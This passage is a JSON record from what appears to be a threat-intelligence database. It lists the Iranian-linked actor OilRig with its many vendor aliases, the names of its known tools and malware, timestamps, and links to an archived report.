"Bibi", "GramPy", "GramPyLoader" ], "source_id": "Secureworks", "reports": null }, { "id": "b6436f7b-6012-4969-aed1-d440e2e8b238", "created_at": "2022-10-25T16:07:23.91517Z", "updated_at": "2026-04-18T02:00:05.155941Z", "deleted_at": null, "main_name": "OilRig", "aliases": [ "APT 34", "ATK 40", "Chrysene", "Cobalt Gypsy", "Crambus", "DEV-0861", "EUROPIUM", "Earth Simnavaz", "Evasive Serpens", "G0049", "Hazel Sandstorm", "Helix Kitten", "IRN2", "ITG13", "Scarred Manticore", "Storm-0861", "TA452", "Twisted Kitten", "UNC1860", "Yellow Maero" ], "source_name": "ETDA:OilRig", "tools": [ "AMATIAS", "Agent Drable", "Agent Injector", "AgentDrable", "Alma Communicator", "BONDUPDATER", "CACTUSPIPE", "Clayslide", "CypherRat", "DNSExfitrator", "DNSpionage", "DROPSHOT", "DistTrack", "DropperBackdoor", "Fox Panel", "GREYSTUFF", "GoogleDrive RAT", "HighShell", "HyperShell", "ISMAgent", "ISMDoor", "ISMInjector", "Jason", "Karkoff", "LIONTAIL", "LOLBAS", "LOLBins", "LONGWATCH", "LaZagne", "Living off the Land", "MailDropper", "Mimikatz", "MrPerfectInstaller", "OILYFACE", "OopsIE", "POWBAT", "POWRUNER", "Plink", "Poison Frog", "PowerExchange", "PsList", "PuTTY Link", "QUADAGENT", "RDAT", "RGDoor", "SEASHARPEE", "Saitama", "Saitama Backdoor", "Shamoon", "SideTwist", "SpyNote", "SpyNote RAT", "StoneDrill", "TONEDEAF", "TONEDEAF 2.0", "ThreeDollars", "TwoFace", "VALUEVAULT", "Webmask", "WinRAR", "ZEROCLEAR", "ZeroCleare", "certutil", "certutil.exe" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1776219773, "ts_updated_at": 1776478860, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/ece80f47e5d165dd8d475fa43cf4ff7f95a90d4b.pdf", "text": "https://archive.orkl.eu/ece80f47e5d165dd8d475fa43cf4ff7f95a90d4b.txt", "img": "https://archive.orkl.eu/ece80f47e5d165dd8d475fa43cf4ff7f95a90d4b.jpg" } }